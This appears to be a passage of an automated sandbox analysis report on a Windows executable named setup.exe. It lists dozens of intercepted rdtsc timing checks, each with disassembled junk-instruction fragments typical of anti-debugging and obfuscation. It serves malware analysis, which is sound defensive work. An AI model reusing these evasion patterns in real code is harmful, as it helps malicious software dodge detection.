                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47C0F1B second address: 47C0F35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47C0F35 second address: 47C0F39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47C0F39 second address: 47C0F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47C0F3F second address: 47C0F78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c call 00007FE0B4F44DCAh 0x00000011 call 00007FE0B4F44DD2h 0x00000016 pop esi 0x00000017 pop edx 0x00000018 popad 0x00000019 pop ebp 0x0000001a pushad 0x0000001b mov edi, ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f mov dx, cx 0x00000022 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A00BE second address: 47A0145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 pushfd 0x00000007 jmp 00007FE0B4522B29h 0x0000000c or eax, 0EF98476h 0x00000012 jmp 00007FE0B4522B21h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c jmp 00007FE0B4522B21h 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FE0B4522B23h 0x0000002b add ecx, 78349A5Eh 0x00000031 jmp 00007FE0B4522B29h 0x00000036 popfd 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0145 second address: 47A014A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A014A second address: 47A0150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A01EC second address: 47A0208 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b mov bl, ah 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47C0CC2 second address: 47C0CEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE0B4522B1Dh 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47C0816 second address: 47C081C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47C081C second address: 47C0857 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FE0B4522B1Dh 0x00000014 sub al, 00000066h 0x00000017 jmp 00007FE0B4522B21h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47C0857 second address: 47C0872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, cl 0x00000005 mov bx, 2FFAh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE0B4F44DCCh 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47C0872 second address: 47C0878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47C054D second address: 47C0568 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 jmp 00007FE0B4F44DCBh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47C0568 second address: 47C0583 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47C0583 second address: 47C0589 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47C0589 second address: 47C05B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE0B4522B25h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47C05B2 second address: 47C05B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47C05B8 second address: 47C05BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47D0332 second address: 47D0338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4800ABA second address: 4800AEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE0B4522B27h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4800AEE second address: 4800AF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47E0581 second address: 47E05A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE0B4522B1Eh 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47E05A6 second address: 47E0605 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 call 00007FE0B4F44DCDh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FE0B4F44DD7h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 mov ebx, esi 0x00000019 mov ebx, esi 0x0000001b popad 0x0000001c mov eax, dword ptr [ebp+08h] 0x0000001f jmp 00007FE0B4F44DCAh 0x00000024 and dword ptr [eax], 00000000h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FE0B4F44DD7h 0x0000002e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47E00A6 second address: 47E00AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47E00AA second address: 47E00AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47E00AE second address: 47E00B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47E00B4 second address: 47E0128 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 pushfd 0x00000007 jmp 00007FE0B4F44DD1h 0x0000000c sbb ch, 00000036h 0x0000000f jmp 00007FE0B4F44DD1h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a mov ax, bx 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 call 00007FE0B4F44DCEh 0x00000028 pop eax 0x00000029 pushfd 0x0000002a jmp 00007FE0B4F44DCBh 0x0000002f sub al, 0000001Eh 0x00000032 jmp 00007FE0B4F44DD9h 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47E0128 second address: 47E0148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 movsx edx, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE0B4522B21h 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47E0148 second address: 47E014E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47E014E second address: 47E0152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47E0152 second address: 47E0156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47E0312 second address: 47E0316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47E0316 second address: 47E031A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47E031A second address: 47E0320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47E0320 second address: 47E039A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FE0B4F44DCEh 0x00000011 or ax, D6F8h 0x00000016 jmp 00007FE0B4F44DCBh 0x0000001b popfd 0x0000001c mov si, A42Fh 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 mov bx, D4E6h 0x00000027 mov dl, 59h 0x00000029 popad 0x0000002a xchg eax, ebp 0x0000002b jmp 00007FE0B4F44DD6h 0x00000030 mov ebp, esp 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FE0B4F44DD7h 0x00000039 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 480028F second address: 480029C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 480029C second address: 48002A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 48002A0 second address: 48002EB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE0B4522B26h 0x00000008 jmp 00007FE0B4522B25h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ah, 18h 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007FE0B4522B1Ah 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov dl, D8h 0x0000001f mov esi, 64C3A205h 0x00000024 popad 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 48002EB second address: 4800336 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE0B4F44DD1h 0x00000009 and si, D8D6h 0x0000000e jmp 00007FE0B4F44DD1h 0x00000013 popfd 0x00000014 call 00007FE0B4F44DD0h 0x00000019 pop eax 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 movzx ecx, dx 0x00000025 mov ah, bh 0x00000027 popad 0x00000028 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4800336 second address: 4800346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4522B1Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4800346 second address: 4800377 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bh, FEh 0x0000000e pushfd 0x0000000f jmp 00007FE0B4F44DD2h 0x00000014 and cl, FFFFFFB8h 0x00000017 jmp 00007FE0B4F44DCBh 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4800377 second address: 480037D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 480037D second address: 4800381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4800381 second address: 48003C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ecx 0x0000000e jmp 00007FE0B4522B26h 0x00000013 mov eax, dword ptr [778165FCh] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE0B4522B27h 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 48003C9 second address: 48003CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 48003CF second address: 48003D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 48003D3 second address: 4800415 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d jmp 00007FE0B4F44DD6h 0x00000012 je 00007FE127ED8330h 0x00000018 pushad 0x00000019 mov ecx, 014822DDh 0x0000001e mov dx, si 0x00000021 popad 0x00000022 mov ecx, eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov ecx, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4800415 second address: 480041A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 480041A second address: 480047A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d mov ebx, 7084A762h 0x00000012 jmp 00007FE0B4F44DD3h 0x00000017 popad 0x00000018 and ecx, 1Fh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov cl, bh 0x00000020 pushfd 0x00000021 jmp 00007FE0B4F44DCCh 0x00000026 xor ax, 8928h 0x0000002b jmp 00007FE0B4F44DCBh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4800535 second address: 4800539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4800539 second address: 480053F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 480053F second address: 4800572 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ch 0x00000005 mov ecx, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE0B4522B22h 0x00000013 add si, 1A98h 0x00000018 jmp 00007FE0B4522B1Bh 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4800572 second address: 48005AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 call 00007FE0B4F44DD6h 0x0000000a push ecx 0x0000000b pop edi 0x0000000c pop eax 0x0000000d popad 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE0B4F44DD8h 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 48005AE second address: 48005CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ecx, 0A8A3A2Bh 0x00000011 mov ax, 4E07h 0x00000015 popad 0x00000016 pop ebp 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0017 second address: 47B001B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B001B second address: 47B001F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B001F second address: 47B0025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0025 second address: 47B0057 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 movzx eax, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FE0B4522B1Ch 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FE0B4522B27h 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0057 second address: 47B0083 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 push edx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FE0B4F44DCDh 0x00000012 and esp, FFFFFFF8h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FE0B4F44DCDh 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0083 second address: 47B00F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FE0B4522B27h 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ecx 0x0000000d jmp 00007FE0B4522B22h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FE0B4522B1Ch 0x0000001c sbb si, A888h 0x00000021 jmp 00007FE0B4522B1Bh 0x00000026 popfd 0x00000027 call 00007FE0B4522B28h 0x0000002c pop ecx 0x0000002d popad 0x0000002e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B00F0 second address: 47B015A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007FE0B4F44DD0h 0x0000000f xchg eax, ebx 0x00000010 jmp 00007FE0B4F44DD0h 0x00000015 push eax 0x00000016 pushad 0x00000017 mov dh, 94h 0x00000019 pushfd 0x0000001a jmp 00007FE0B4F44DCAh 0x0000001f sub ch, FFFFFFA8h 0x00000022 jmp 00007FE0B4F44DCBh 0x00000027 popfd 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FE0B4F44DD0h 0x00000033 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B015A second address: 47B0169 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0169 second address: 47B016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B016F second address: 47B0173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0173 second address: 47B0177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0177 second address: 47B01B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b pushad 0x0000000c movsx edx, ax 0x0000000f jmp 00007FE0B4522B26h 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FE0B4522B27h 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B01B7 second address: 47B01BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B01BD second address: 47B01C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B01C1 second address: 47B01CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B01CF second address: 47B01D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 953Ch 0x00000008 popad 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B01D8 second address: 47B01ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4F44DD1h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B01ED second address: 47B0210 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dh, 03h 0x00000011 mov ecx, 4D38C51Bh 0x00000016 popad 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0210 second address: 47B025F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007FE0B4F44DCEh 0x00000011 xchg eax, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FE0B4F44DCDh 0x0000001b add ah, 00000006h 0x0000001e jmp 00007FE0B4F44DD1h 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B025F second address: 47B0264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0264 second address: 47B02A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE0B4F44DD9h 0x0000000f xchg eax, edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B02A0 second address: 47B02A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B02A4 second address: 47B02AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
